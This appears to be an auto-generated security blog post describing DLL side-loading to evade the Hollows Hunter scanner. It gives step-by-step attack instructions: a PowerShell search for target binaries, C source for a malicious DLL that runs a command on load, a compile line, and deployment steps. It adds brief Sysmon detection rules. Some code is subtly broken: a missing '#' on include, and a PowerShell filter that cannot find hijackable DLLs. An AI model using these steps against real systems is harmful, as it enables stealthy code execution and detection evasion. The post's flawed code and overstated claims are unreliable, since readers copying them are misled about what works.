Hassan Sohrabian’s recent post highlights an advanced anti-forensic technique involving DLL Side-Loading to bypass Hollows Hunter, a popular tool for detecting process hollowing and other malicious activities. This attack leverages legitimate Windows processes to load malicious DLLs, evading detection mechanisms like API/IAT hooking or direct syscall monitoring.
You Should Know:
1. Understanding Hollows Hunter Bypass
Hollows Hunter scans for anomalies in memory-mapped modules, but DLL side-loading abuses trusted executables (e.g., rundll32.exe, svchost.exe) to load malicious payloads without triggering hollowing alerts.
2. Practical Steps for DLL Side-Loading Attack
Step 1: Identify a Legitimate Executable with DLL Search Order Hijacking
Get-ChildItem -Path "C:\Windows\System32" -Filter .exe | Where-Object { Test-Path "$($_.Name).local" }
Step 2: Craft a Malicious DLL (Example in C)
include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
system("cmd.exe /c calc.exe");
}
return TRUE;
}
Compile with:
x86_64-w64-mingw32-gcc -shared -o evil.dll evil.c
Step 3: Deploy the Malicious DLL
Place the malicious DLL in the application’s directory or a higher-priority search path:
copy evil.dll C:\TrustedApp\legit.dll
Step 4: Execute the Legitimate Binary
start C:\TrustedApp\trusted.exe
3. Why Hollows Hunter Misses This?
- No Process Hollowing: The attack doesn’t replace a legitimate process’s memory.
- Legitimate Loader: The malicious DLL is loaded via a signed binary.
- No API Hooking: Direct execution avoids common hooking detections.
4. Detection & Mitigation
Sysmon Configuration (Event ID 7: Image Load)
<RuleGroup name="DLL Monitoring" groupRelation="or"> <ImageLoad onmatch="include"> <ImageLoaded condition="contains">evil.dll</ImageLoaded> </ImageLoad> </RuleGroup>
Hunt for Anomalous DLL Loads
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=7} | Where-Object { $_.Message -match "evil.dll" }
What Undercode Say
DLL side-loading remains a potent evasion technique, exploiting Windows’ trust in signed binaries. DFIR teams must:
– Monitor unsigned DLLs loaded by system processes.
– Enforce strict application whitelisting.
– Analyze process behavior (e.g., `Process Explorer` for unexpected child processes).
– Use YARA rules to detect malicious DLL patterns.
Expected Output:
A stealthy DLL side-loading attack executing `calc.exe` without Hollows Hunter detection, demonstrating the need for deeper behavioral analysis in threat hunting.
Prediction
As EDR solutions improve, attackers will shift toward more sophisticated side-loading techniques, including reflective DLL injection and COM hijacking, requiring defenders to adopt memory forensics and anomaly-based detection.
References:
Reported By: Hassan Sohrabian – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
